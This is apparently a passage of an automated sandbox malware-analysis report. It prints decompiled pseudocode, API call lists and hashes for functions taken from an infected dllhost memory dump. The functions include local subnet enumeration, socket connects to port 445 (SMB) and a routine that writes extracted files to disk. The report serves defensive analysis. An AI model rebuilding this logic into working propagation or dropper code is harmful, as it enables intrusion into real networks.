                                                0x00000000
                                                0x00000000
                                                0x02867c9a
                                                0x02867ca4
                                                0x02867ca6
                                                0x02867ca9
                                                0x02867cad
                                                0x02867cb4
                                                0x02867ddf
                                                0x02867de4
                                                0x00000000
                                                0x02867de4
                                                0x02867cba
                                                0x02867cc0
                                                0x02867cc0
                                                0x02867cc1
                                                0x02867cc8
                                                0x02867ccb
                                                0x02867cd2
                                                0x02867cda
                                                0x02867cde
                                                0x02867ce5
                                                0x02867ceb
                                                0x02867cef
                                                0x02867cf4
                                                0x02867cf7
                                                0x02867d05
                                                0x02867d0f
                                                0x02867d16
                                                0x02867d1c
                                                0x02867d1f
                                                0x02867d1f
                                                0x02867d22
                                                0x02867d22
                                                0x02867d24
                                                0x02867d25
                                                0x02867d29
                                                0x02867d2b
                                                0x02867d2b
                                                0x02867d2f
                                                0x02867d36
                                                0x02867d41
                                                0x02867d49
                                                0x02867d4e
                                                0x02867d55
                                                0x02867d5b
                                                0x02867d64
                                                0x02867d6e
                                                0x02867d6e
                                                0x02867d7a
                                                0x02867d84
                                                0x02867d91
                                                0x02867d98
                                                0x02867d9d
                                                0x02867da0
                                                0x02867dac
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02867dac
                                                0x02867d18
                                                0x00000000
                                                0x02867dae
                                                0x02867db4
                                                0x02867db5
                                                0x02867dbb
                                                0x02867dc2
                                                0x02867dc5
                                                0x02867dc8
                                                0x02867dcc
                                                0x02867dd0
                                                0x02867dd9
                                                0x00000000
                                                0x02867dd9
                                                0x02867c93
                                                0x00000000

                                                APIs
                                                • gethostname.WS2_32(?,00000100), ref: 02867C75
                                                • gethostbyname.WS2_32(?), ref: 02867C82
                                                • Sleep.KERNEL32(0002BF20), ref: 02867C93
                                                • Sleep.KERNELBASE(000DBBA0), ref: 02867DE4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: Sleep$gethostbynamegethostname
                                                • String ID: %d.%d.%d.*
                                                • API String ID: 3714389383-3742512694
                                                • Opcode ID: b9ad53e3ec43f0bceebe6bd75601e86586bd89bc3746c4e64886bb1b66d42451
                                                • Instruction ID: 4b55b16a4e5998a2a1b2f977813bd6503093a5c1edfcd35b0fbe4357d6284a9c
                                                • Opcode Fuzzy Hash: b9ad53e3ec43f0bceebe6bd75601e86586bd89bc3746c4e64886bb1b66d42451
                                                • Instruction Fuzzy Hash: 1851F4788002589FEB21DB64CC58BFEBBB5FF05308F144599E459E7291DB74AA44CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02867140 Relevance: 7.6, APIs: 5, Instructions: 58fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 80%
                                                			E02867140(void* __eflags, CHAR* _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _t12;
				void* _t13;
				int _t16;
				void* _t21;
				void* _t22;
				long _t24;
				void* _t26;
				void* _t29;

				_v12 = 0;
				_v8 = 0;
				_t12 = E02864AC0(_t21, _t22,  &_v12,  &_v8); // executed
				if(_t12 != 0) {
					_t24 = _v8;
					_v16 = 0;
					_t13 = CreateFileA(_a4, 0x40000000, 2, 0, 2, 0x80, 0); // executed
					_t29 = _t13;
					if(_t29 == 0) {
						L5:
						return 0; // executed
					} else {
						_t26 = _v12;
						_t16 = WriteFile(_t29, _t26, _t24,  &_v16, 0); // executed
						_push(_t29);
						if(_t16 != 0) {
							FindCloseChangeNotification(); // executed
							LocalFree(_t26); // executed
							return 1;
						} else {
							CloseHandle();
							goto L5;
						}
					}
				} else {
					return _t12;
				}
			}














                                                0x02867149
                                                0x02867154
                                                0x0286715c
                                                0x02867166
                                                0x0286716e
                                                0x02867186
                                                0x0286718d
                                                0x02867193
                                                0x02867197
                                                0x028671b6
                                                0x028671bd
                                                0x02867199
                                                0x028671a0
                                                0x028671a5
                                                0x028671ab
                                                0x028671ae
                                                0x028671be
                                                0x028671c5
                                                0x028671d2
                                                0x028671b0
                                                0x028671b0
                                                0x00000000
                                                0x028671b0
                                                0x028671ae
                                                0x0286716b
                                                0x0286716b
                                                0x0286716b

                                                APIs
                                                • CreateFileA.KERNELBASE(00000000,40000000,00000002,00000000,00000002,00000080,00000000,?,?), ref: 0286718D
                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?), ref: 028671A5
                                                • CloseHandle.KERNEL32(00000000,?,?), ref: 028671B0
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleWrite
                                                • String ID:
                                                • API String ID: 1065093856-0
                                                • Opcode ID: d8c0a427ee00d86a3f65367fe49ee7276d61842be275dae9b3d51428e952061a
                                                • Instruction ID: 469d4f0146f15bb98686fd2d7724314886a80844c7613d7ab56b03b650e42c1d
                                                • Opcode Fuzzy Hash: d8c0a427ee00d86a3f65367fe49ee7276d61842be275dae9b3d51428e952061a
                                                • Instruction Fuzzy Hash: 5401887DD80208B7DB209E98AC0AFEEBB7CDB45B15F104186FD04E6180D775551587E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0286B3C0 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 84%
                                                			E0286B3C0(void* __ebx, void* __esi, intOrPtr _a4) {
				void* __edi;
				void* _t9;
				void* _t11;
				intOrPtr _t19;
				intOrPtr _t24;
				void* _t28;

				_t24 = _a4;
				if(_t24 != 0) {
					InterlockedIncrement(0x2896a48);
					_t11 = E0286B320(__ebx, _t24, _t24); // executed
					_t31 = _t11;
					if(_t11 != 0) {
						_push(__ebx);
						_push(__esi);
						_t19 = E02870A6E(__esi, _t31, 0x2c);
						_a4 = _t19;
						E02875C70(_t19, 0x20, _t24);
						_t28 = _t28 + 0x10;
						 *((intOrPtr*)(_t19 + 0x20)) = 0;
						 *((intOrPtr*)(_t19 + 0x24)) = 0;
						 *((intOrPtr*)(_t19 + 0x28)) =  *((intOrPtr*)(_t24 + 0x28));
						EnterCriticalSection(0x2896a5c);
						if(E02866F70(0x2895b80) != 0) {
							 *((intOrPtr*)( *0x2895b9c +  *0x2895ba0 * 4)) = _t19;
							 *0x2895ba0 =  *0x2895ba0 + 1;
						}
						LeaveCriticalSection(0x2896a5c);
					}
					_push(0x2c);
					E02870AA1(_t24);
					return InterlockedDecrement(0x2896a48);
				}
				return _t9;
			}









                                                0x0286b3c4
                                                0x0286b3c9
                                                0x0286b3d4
                                                0x0286b3dc
                                                0x0286b3e1
                                                0x0286b3e3
                                                0x0286b3e5
                                                0x0286b3e6
                                                0x0286b3f1
                                                0x0286b3f7
                                                0x0286b3fa
                                                0x0286b3ff
                                                0x0286b402
                                                0x0286b409
                                                0x0286b410
                                                0x0286b418
                                                0x0286b42a
                                                0x0286b437
                                                0x0286b43a
                                                0x0286b43a
                                                0x0286b445
                                                0x0286b44c
                                                0x0286b44d
                                                0x0286b450
                                                0x00000000
                                                0x0286b45d
                                                0x0286b465

                                                APIs
                                                • InterlockedIncrement.KERNEL32(02896A48), ref: 0286B3D4
                                                  • Part of subcall function 0286B320: socket.WS2_32(00000002,00000001,00000006), ref: 0286B33A
                                                  • Part of subcall function 0286B320: inet_addr.WS2_32(?), ref: 0286B351
                                                  • Part of subcall function 0286B320: htons.WS2_32(000001BD), ref: 0286B35F
                                                  • Part of subcall function 0286B320: connect.WS2_32(00000000,?,00000010), ref: 0286B370
                                                  • Part of subcall function 0286B320: closesocket.WS2_32(00000000), ref: 0286B37C
                                                • new.LIBCMT ref: 0286B3E9
                                                • EnterCriticalSection.KERNEL32(02896A5C), ref: 0286B418
                                                • LeaveCriticalSection.KERNEL32(02896A5C), ref: 0286B445
                                                • InterlockedDecrement.KERNEL32(02896A48), ref: 0286B45D
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: CriticalInterlockedSection$DecrementEnterIncrementLeaveclosesocketconnecthtonsinet_addrsocket
                                                • String ID:
                                                • API String ID: 2254562651-0
                                                • Opcode ID: ce0f079e87527c60bf1309ab4b0e81265f6a0744102abb84b7a168c89f9504c0
                                                • Instruction ID: 00e9663d8838546a044d9b5bb79e11b5017855790f2cb22f826de66fa838d255
                                                • Opcode Fuzzy Hash: ce0f079e87527c60bf1309ab4b0e81265f6a0744102abb84b7a168c89f9504c0
                                                • Instruction Fuzzy Hash: 1B01FEBC680304ABEB006F58EC59F7D7B69EF4576CF894008ED09D7381D77994208B92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0286FB00 Relevance: 6.1, APIs: 4, Instructions: 129COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 83%
                                                			E0286FB00(CHAR* __ecx, void* __edx) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				char _v268;
				char _v271;
				char _v272;
				char _v528;
				char _v532;
				struct _FILETIME _v548;
				struct _FILETIME _v556;
				struct _FILETIME _v564;
				long _v568;
				char _v832;
				char _v833;
				struct _OVERLAPPED* _v840;
				long _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t91;
				void _t93;
				void _t95;
				void _t96;
				char _t103;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed int _t113;
				char _t114;
				void* _t116;
				signed int _t124;
				void* _t130;
				long _t133;
				signed int _t143;
				void* _t144;
				signed int _t153;
				signed int _t158;
				signed int _t160;
				long _t166;
				void* _t169;
				signed int _t171;
				char _t172;
				signed int _t173;
				void* _t175;
				void* _t183;
				signed int _t185;
				void* _t191;
				intOrPtr _t192;
				char _t194;
				signed int* _t195;
				signed int _t198;
				signed int* _t206;
				char _t218;
				void* _t226;
				void* _t228;
				void* _t234;
				signed int* _t235;
				signed int _t236;
				CHAR* _t243;
				void* _t244;
				void* _t245;
				signed int _t247;
				signed int* _t248;
				long _t250;
				void* _t251;
				void* _t252;
				void* _t253;
				signed int _t254;
				signed int _t256;
				signed int _t258;
				signed int _t263;
				signed int _t264;
				void* _t268;
				void* _t270;

				_t217 = __edx;
				_t256 = _t263;
				_t264 = _t263 - 0x20c;
				_t91 =  *0x288f008; // 0xe7fe870c
				_v8 = _t91 ^ _t256;
				_t243 = __ecx;
				_t169 = __edx;
				if(__ecx != 0) {
					_t166 = GetFileAttributesA(__ecx); // executed
					if(_t166 == 0xffffffff) {
						CreateDirectoryA(_t243, 0);
					}
				}
				_t93 =  *_t169;
				if(_t93 == 0) {
					L21:
					_pop(_t244);
					return E02870A5D(_v8 ^ _t256, _t244);
				} else {
					_t226 = _t169;
					_t183 = _t169;
					do {
						if(_t93 == 0x2f || _t93 == 0x5c) {
							_t226 = _t183;
						}
						_t93 =  *(_t183 + 1);
						_t183 = _t183 + 1;
					} while (_t93 != 0);
					if(_t226 == _t169) {
						L12:
						_v268 = 0;
						if(_t243 != 0) {
							_t191 =  &_v268 - _t243;
							do {
								_t103 =  *_t243;
								_t243 =  &(_t243[1]);
								 *((char*)(_t191 + _t243 - 1)) = _t103;
							} while (_t103 != 0);
						}
						_t245 = _t169;
						do {
							_t95 =  *_t169;
							_t169 = _t169 + 1;
						} while (_t95 != 0);
						_t171 = _t169 - _t245;
						_t228 =  &_v268 - 1;
						do {
							_t96 =  *(_t228 + 1);
							_t228 = _t228 + 1;
						} while (_t96 != 0);
						_t185 = _t171 >> 2;
						memcpy(_t228, _t245, _t185 << 2);
						if(GetFileAttributesA(memcpy(_t245 + _t185 + _t185, _t245, _t171 & 0x00000003)) == 0xffffffff) {
							CreateDirectoryA( &_v268, 0);
						}
						goto L21;
					} else {
						_t234 = _t226 - _t169;
						E02883DB0( &_v528, _t169, _t234);
						_t264 = _t264 + 0xc;
						if(_t234 >= 0x104) {
							E02870E90();
							asm("int3");
							asm("int3");
							asm("int3");
							_push(_t256);
							_t258 = _t264;
							_t268 = _t264 - 0x344;
							_t107 =  *0x288f008; // 0xe7fe870c
							_v548.dwLowDateTime = _t107 ^ _t258;
							_push(_t169);
							_t172 = _v532;
							_push(_t234);
							_t235 = _t183;
							__eflags = _t235[1] - 0xffffffff;
							if(_t235[1] != 0xffffffff) {
								E0286F2D0( *_t235, _t217);
							}
							_t109 =  *_t235;
							_t192 = _v0;
							_t235[1] = 0xffffffff;
							__eflags = _t192 -  *((intOrPtr*)(_t109 + 4));
							if(_t192 <  *((intOrPtr*)(_t109 + 4))) {
								__eflags = _t192 -  *((intOrPtr*)(_t109 + 0x10));
								if(_t192 <  *((intOrPtr*)(_t109 + 0x10))) {
									E0286EC60(_t109);
									_t192 = _v0;
								}
								_t110 =  *_t235;
								_push(_t243);
								__eflags =  *((intOrPtr*)(_t110 + 0x10)) - _t192;
								if( *((intOrPtr*)(_t110 + 0x10)) < _t192) {
									do {
										_t254 =  *_t235;
										__eflags = _t254;
										if(_t254 != 0) {
											__eflags =  *(_t254 + 0x18);
											if( *(_t254 + 0x18) != 0) {
												_t217 =  *((intOrPtr*)(_t254 + 0x10)) + 1;
												__eflags = _t217 -  *((intOrPtr*)(_t254 + 4));
												if(_t217 !=  *((intOrPtr*)(_t254 + 4))) {
													 *((intOrPtr*)(_t254 + 0x10)) = _t217;
													 *((intOrPtr*)(_t254 + 0x14)) =  *((intOrPtr*)(_t254 + 0x14)) +  *((intOrPtr*)(_t254 + 0x48)) + 0x2e +  *((intOrPtr*)(_t254 + 0x50)) +  *((intOrPtr*)(_t254 + 0x4c));
													_t37 = _t254 + 0x28; // 0x28
													_t217 = _t37;
													_t38 = _t254 + 0x78; // 0x78
													_t158 = E0286E7C0(_t254, _t37, _t38, 0, 0);
													_t192 = _v0;
													_t268 = _t268 - 0x10 + 0x1c;
													asm("sbb eax, eax");
													_t160 =  ~_t158 + 1;
													__eflags = _t160;
													 *(_t254 + 0x18) = _t160;
												}
											}
										}
										_t153 =  *_t235;
										__eflags =  *((intOrPtr*)(_t153 + 0x10)) - _t192;
									} while ( *((intOrPtr*)(_t153 + 0x10)) < _t192);
								}
								E0286F4E0(_t172, _t235, _t217, _t235, _t192,  &_v832);
								__eflags = _v568 & 0x00000010;
								_t113 =  *_t172;
								if((_v568 & 0x00000010) == 0) {
									_t218 = _t172;
									_t194 = _t172;
									__eflags = _t113;
									while(_t113 != 0) {
										__eflags = _t113 - 0x2f;
										if(_t113 == 0x2f) {
											L46:
											_t49 = _t194 + 1; // 0x2865105
											_t218 = _t49;
										} else {
											__eflags = _t113 - 0x5c;
											if(_t113 == 0x5c) {
												goto L46;
											}
										}
										_t50 = _t194 + 1; // 0x2896a4c
										_t113 =  *_t50;
										_t194 = _t194 + 1;
										__eflags = _t113;
									}
									_t195 = _t172;
									_t247 =  &_v272 - _t172;
									__eflags = _t247;
									do {
										_t114 =  *_t195;
										_t52 =  &(_t195[0]); // 0x2896a4c
										_t195 = _t52;
										 *((char*)(_t247 + _t195 - 1)) = _t114;
										__eflags = _t114;
									} while (_t114 != 0);
									__eflags = _t218 - _t172;
									if(_t218 != _t172) {
										_t116 = _t218 - _t172;
										__eflags = _t116 - 0x104;
										if(_t116 >= 0x104) {
											E02870E90();
											asm("int3");
											asm("int3");
											asm("int3");
											_push(_t247);
											_t248 = _t195;
											_push(_t235);
											__eflags = _t248[1] - 0xffffffff;
											if(_t248[1] != 0xffffffff) {
												E0286F2D0( *_t248, _t218);
											}
											_t236 =  *_t248;
											_t248[1] = 0xffffffff;
											__eflags = _t236;
											if(_t236 != 0) {
												__eflags =  *(_t236 + 0x7c);
												if( *(_t236 + 0x7c) != 0) {
													E0286F2D0(_t236, _t218);
												}
												_push(_t172);
												_t173 =  *_t236;
												__eflags = _t173;
												if(_t173 != 0) {
													__eflags =  *((char*)(_t173 + 0x10));
													if( *((char*)(_t173 + 0x10)) != 0) {
														CloseHandle( *(_t173 + 4));
													}
													_push(0x20);
													E02870AA1(_t173);
													_t268 = _t268 + 8;
												}
												L02875A36(_t236);
											}
											__eflags = 0;
											 *_t248 = 0;
											return 0;
										} else {
											 *((char*)(_t258 + _t116 - 0x108)) = 0;
											_t124 = _v272;
											__eflags = _t124 - 0x2f;
											if(_t124 == 0x2f) {
												L58:
												wsprintfA( &_v532, "%s%s",  &_v272, _t218);
												_t270 = _t268 + 0x10;
												_t198 = 0;
												__eflags = 0;
											} else {
												__eflags = _t124 - 0x5c;
												if(_t124 == 0x5c) {
													goto L58;
												} else {
													__eflags = _t124;
													if(_t124 == 0) {
														goto L57;
													} else {
														__eflags = _v271 - 0x3a;
														if(_v271 == 0x3a) {
															goto L58;
														} else {
															goto L57;
														}
													}
												}
											}
											goto L59;
										}
									} else {
										_v272 = _t114;
										L57:
										_t247 =  &(_t235[0x50]);
										wsprintfA( &_v532, "%s%s%s", _t247,  &_v272, _t218);
										_t270 = _t268 + 0x14;
										_t198 = _t247;
										L59:
										E0286FB00(_t198,  &_v272); // executed
										_t130 = CreateFileA( &_v532, 0x40000000, 0, 0, 2, _v568, 0); // executed
										_t175 = _t130;
										__eflags = _t175 - 0xffffffff;
										if(_t175 != 0xffffffff) {
											E0286EF10( *_t235, _t235[0x4e]); // executed
											__eflags = _t235[0x4f];
											if(__eflags == 0) {
												_push(0x4000);
												_t144 = E02870AB4(_t247, __eflags);
												_t270 = _t270 + 4;
												_t235[0x4f] = _t144;
											}
											_v840 = 0;
											while(1) {
												_t221 = _t235[0x4f];
												_t133 = E0286F090( *_t235, _t235[0x4f], 0x4000,  &_v833); // executed
												_t250 = _t133;
												_t270 = _t270 + 8;
												__eflags = _t250 - 0xffffff96;
												if(_t250 == 0xffffff96) {
													break;
												}
												__eflags = _t250;
												if(__eflags < 0) {
													L70:
													_v840 = 0x5000000;
												} else {
													if(__eflags <= 0) {
														L68:
														__eflags = _v833;
														if(_v833 != 0) {
															SetFileTime(_t175,  &_v556,  &_v564,  &_v548); // executed
														} else {
															__eflags = _t250;
															if(_t250 != 0) {
																continue;
															} else {
																goto L70;
															}
														}
													} else {
														_t143 = WriteFile(_t175, _t235[0x4f], _t250,  &_v844, 0); // executed
														__eflags = _t143;
														if(_t143 == 0) {
															_v840 = 0x400;
														} else {
															goto L68;
														}
													}
												}
												L74:
												FindCloseChangeNotification(_t175); // executed
												E0286F2D0( *_t235, _t221);
												__eflags = _v12 ^ _t258;
												_pop(_t251);
												return E02870A5D(_v12 ^ _t258, _t251);
												goto L87;
											}
											_v840 = 0x1000;
											goto L74;
										} else {
											_pop(_t252);
											__eflags = _v12 ^ _t258;
											return E02870A5D(_v12 ^ _t258, _t252);
										}
									}
								} else {
									__eflags = _t113 - 0x2f;
									if(_t113 == 0x2f) {
										L41:
										_t206 = 0;
										__eflags = 0;
									} else {
										__eflags = _t113 - 0x5c;
										if(_t113 == 0x5c) {
											goto L41;
										} else {
											__eflags = _t113;
											if(_t113 == 0) {
												L40:
												_t206 =  &(_t235[0x50]);
											} else {
												__eflags =  *((char*)(_t172 + 1)) - 0x3a;
												if( *((char*)(_t172 + 1)) == 0x3a) {
													goto L41;
												} else {
													goto L40;
												}
											}
										}
									}
									E0286FB00(_t206, _t172);
									_pop(_t253);
									__eflags = _v12 ^ _t258;
									return E02870A5D(_v12 ^ _t258, _t253);
								}
							} else {
								__eflags = _v12 ^ _t258;
								return E02870A5D(_v12 ^ _t258, _t243);
							}
						} else {
							 *((char*)(_t256 + _t234 - 0x20c)) = 0;
							E0286FB00(_t243,  &_v528);
							goto L12;
						}
					}
				}
				L87:
			}













































































                                                0x0286fb00
                                                0x0286fb01
                                                0x0286fb03
                                                0x0286fb09
                                                0x0286fb10
                                                0x0286fb15
                                                0x0286fb17
                                                0x0286fb1b
                                                0x0286fb1e
                                                0x0286fb27
                                                0x0286fb2c
                                                0x0286fb2c
                                                0x0286fb27
                                                0x0286fb32
                                                0x0286fb36
                                                0x0286fbf8
                                                0x0286fbfb
                                                0x0286fc07
                                                0x0286fb3c
                                                0x0286fb3d
                                                0x0286fb3f
                                                0x0286fb41
                                                0x0286fb43
                                                0x0286fb49
                                                0x0286fb49
                                                0x0286fb4b
                                                0x0286fb4e
                                                0x0286fb4f
                                                0x0286fb55
                                                0x0286fb8b
                                                0x0286fb8b
                                                0x0286fb94
                                                0x0286fb9c
                                                0x0286fba0
                                                0x0286fba0
                                                0x0286fba2
                                                0x0286fba5
                                                0x0286fba9
                                                0x0286fba0
                                                0x0286fbad
                                                0x0286fbb0
                                                0x0286fbb0
                                                0x0286fbb2
                                                0x0286fbb3
                                                0x0286fbbd
                                                0x0286fbbf
                                                0x0286fbc0
                                                0x0286fbc0
                                                0x0286fbc3
                                                0x0286fbc4
                                                0x0286fbd0
                                                0x0286fbd3
                                                0x0286fbe7
                                                0x0286fbf2
                                                0x0286fbf2
                                                0x00000000
                                                0x0286fb57
                                                0x0286fb57
                                                0x0286fb62
                                                0x0286fb67
                                                0x0286fb70
                                                0x0286fc08
                                                0x0286fc0d
                                                0x0286fc0e
                                                0x0286fc0f
                                                0x0286fc10
                                                0x0286fc11
                                                0x0286fc13
                                                0x0286fc19
                                                0x0286fc20
                                                0x0286fc23
                                                0x0286fc24
                                                0x0286fc27
                                                0x0286fc28
                                                0x0286fc2a
                                                0x0286fc2e
                                                0x0286fc32
                                                0x0286fc32
                                                0x0286fc37
                                                0x0286fc39
                                                0x0286fc3c
                                                0x0286fc43
                                                0x0286fc46
                                                0x0286fc5f
                                                0x0286fc62
                                                0x0286fc66
                                                0x0286fc6b
                                                0x0286fc6b
                                                0x0286fc6e
                                                0x0286fc70
                                                0x0286fc71
                                                0x0286fc74
                                                0x0286fc76
                                                0x0286fc76
                                                0x0286fc78
                                                0x0286fc7a
                                                0x0286fc7c
                                                0x0286fc80
                                                0x0286fc85
                                                0x0286fc86
                                                0x0286fc89
                                                0x0286fc9c
                                                0x0286fc9f
                                                0x0286fca2
                                                0x0286fca2
                                                0x0286fca7
                                                0x0286fcaf
                                                0x0286fcb4
                                                0x0286fcb7
                                                0x0286fcbc
                                                0x0286fcbe
                                                0x0286fcbe
                                                0x0286fcbf
                                                0x0286fcbf
                                                0x0286fc89
                                                0x0286fc80
                                                0x0286fcc2
                                                0x0286fcc4
                                                0x0286fcc4
                                                0x0286fc76
                                                0x0286fcd3
                                                0x0286fcd8
                                                0x0286fcdf
                                                0x0286fce1
                                                0x0286fd1b
                                                0x0286fd1d
                                                0x0286fd1f
                                                0x0286fd21
                                                0x0286fd23
                                                0x0286fd25
                                                0x0286fd2b
                                                0x0286fd2b
                                                0x0286fd2b
                                                0x0286fd27
                                                0x0286fd27
                                                0x0286fd29
                                                0x00000000
                                                0x00000000
                                                0x0286fd29
                                                0x0286fd2e
                                                0x0286fd2e
                                                0x0286fd31
                                                0x0286fd32
                                                0x0286fd32
                                                0x0286fd3c
                                                0x0286fd3e
                                                0x0286fd3e
                                                0x0286fd40
                                                0x0286fd40
                                                0x0286fd42
                                                0x0286fd42
                                                0x0286fd45
                                                0x0286fd49
                                                0x0286fd49
                                                0x0286fd4d
                                                0x0286fd4f
                                                0x0286fd5b
                                                0x0286fd5d
                                                0x0286fd62
                                                0x0286ff08
                                                0x0286ff0d
                                                0x0286ff0e
                                                0x0286ff0f
                                                0x0286ff10
                                                0x0286ff11
                                                0x0286ff13
                                                0x0286ff14
                                                0x0286ff18
                                                0x0286ff1c
                                                0x0286ff1c
                                                0x0286ff21
                                                0x0286ff23
                                                0x0286ff2a
                                                0x0286ff2c
                                                0x0286ff2e
                                                0x0286ff32
                                                0x0286ff36
                                                0x0286ff36
                                                0x0286ff3b
                                                0x0286ff3c
                                                0x0286ff3e
                                                0x0286ff40
                                                0x0286ff42
                                                0x0286ff46
                                                0x0286ff4b
                                                0x0286ff4b
                                                0x0286ff51
                                                0x0286ff54
                                                0x0286ff59
                                                0x0286ff59
                                                0x0286ff5d
                                                0x0286ff65
                                                0x0286ff66
                                                0x0286ff69
                                                0x0286ff6c
                                                0x0286fd68
                                                0x0286fd68
                                                0x0286fd70
                                                0x0286fd76
                                                0x0286fd78
                                                0x0286fdb3
                                                0x0286fdc7
                                                0x0286fdcd
                                                0x0286fdd0
                                                0x0286fdd0
                                                0x0286fd7a
                                                0x0286fd7a
                                                0x0286fd7c
                                                0x00000000
                                                0x0286fd7e
                                                0x0286fd7e
                                                0x0286fd80
                                                0x00000000
                                                0x0286fd82
                                                0x0286fd82
                                                0x0286fd89
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0286fd89
                                                0x0286fd80
                                                0x0286fd7c
                                                0x00000000
                                                0x0286fd78
                                                0x0286fd51
                                                0x0286fd51
                                                0x0286fd8b
                                                0x0286fd93
                                                0x0286fda6
                                                0x0286fdac
                                                0x0286fdaf
                                                0x0286fdd2
                                                0x0286fdd8
                                                0x0286fdf7
                                                0x0286fdfd
                                                0x0286fdff
                                                0x0286fe02
                                                0x0286fe24
                                                0x0286fe29
                                                0x0286fe30
                                                0x0286fe32
                                                0x0286fe37
                                                0x0286fe3c
                                                0x0286fe3f
                                                0x0286fe3f
                                                0x0286fe45
                                                0x0286fe50
                                                0x0286fe50
                                                0x0286fe64
                                                0x0286fe69
                                                0x0286fe6b
                                                0x0286fe6e
                                                0x0286fe71
                                                0x00000000
                                                0x00000000
                                                0x0286fe73
                                                0x0286fe75
                                                0x0286fea1
                                                0x0286fea1
                                                0x0286fe77
                                                0x0286fe77
                                                0x0286fe94
                                                0x0286fe94
                                                0x0286fe9b
                                                0x0286fecf
                                                0x0286fe9d
                                                0x0286fe9d
                                                0x0286fe9f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0286fe9f
                                                0x0286fe79
                                                0x0286fe8a
                                                0x0286fe90
                                                0x0286fe92
                                                0x0286fead
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0286fe92
                                                0x0286fe77
                                                0x0286fee1
                                                0x0286fee2
                                                0x0286feea
                                                0x0286fef8
                                                0x0286fefa
                                                0x0286ff05
                                                0x00000000
                                                0x0286ff05
                                                0x0286fed7
                                                0x00000000
                                                0x0286fe04
                                                0x0286fe04
                                                0x0286fe0f
                                                0x0286fe19
                                                0x0286fe19
                                                0x0286fe02
                                                0x0286fce3
                                                0x0286fce3
                                                0x0286fce5
                                                0x0286fcfd
                                                0x0286fcfd
                                                0x0286fcfd
                                                0x0286fce7
                                                0x0286fce7
                                                0x0286fce9
                                                0x00000000
                                                0x0286fceb
                                                0x0286fceb
                                                0x0286fced
                                                0x0286fcf5
                                                0x0286fcf5
                                                0x0286fcef
                                                0x0286fcef
                                                0x0286fcf3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0286fcf3
                                                0x0286fced
                                                0x0286fce9
                                                0x0286fd01
                                                0x0286fd06
                                                0x0286fd0e
                                                0x0286fd18
                                                0x0286fd18
                                                0x0286fc48
                                                0x0286fc52
                                                0x0286fc5c
                                                0x0286fc5c
                                                0x0286fb76
                                                0x0286fb7c
                                                0x0286fb86
                                                0x00000000
                                                0x0286fb86
                                                0x0286fb70
                                                0x0286fb55
                                                0x00000000

                                                APIs
                                                • GetFileAttributesA.KERNELBASE(00000000,?,02865104), ref: 0286FB1E
                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0286FB2C
                                                • GetFileAttributesA.KERNEL32(00000000,?,?,02865104), ref: 0286FBDD
                                                • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0286FBF2
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: AttributesCreateDirectoryFile
                                                • String ID:
                                                • API String ID: 3401506121-0
                                                • Opcode ID: f0b08beca651bf3afabe2c1375cb00a44803686609865e35fe7b8bba42d278a9
                                                • Instruction ID: d93128d431f4dd86002a334ca7f7512915d6362bec9364f34319559b918d4012
                                                • Opcode Fuzzy Hash: f0b08beca651bf3afabe2c1375cb00a44803686609865e35fe7b8bba42d278a9
                                                • Instruction Fuzzy Hash: 17418E3D5002099FCF20CF3CA898BFDB766AF65310F500699D9AAD7681CB71D946CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0286E0D0 Relevance: 6.1, APIs: 4, Instructions: 59fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 86%
                                                			E0286E0D0(CHAR* __ecx, long* _a8) {
				void* _v8;
				void* __esi;
				void* _t12;
				long _t13;
				void* _t15;
				long _t17;
				signed int _t19;
				signed int _t20;
				long* _t24;
				void* _t27;
				char* _t28;

				_push(__ecx);
				_t24 = _a8;
				 *_t24 = 0; // executed
				_t12 = CreateFileA(__ecx, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v8 = _t12;
				if(_t12 != 0xffffffff) {
					_push(_t19);
					_push(_t27);
					_t13 = SetFilePointer(_t12, 0, 0, 1); // executed
					__eflags = _t13 - 0xffffffff;
					_t20 = _t19 & 0xffffff00 | __eflags != 0x00000000;
					_t28 = E02870A6E(_t27, __eflags, 0x20);
					_t15 = _v8;
					 *_t28 = 1;
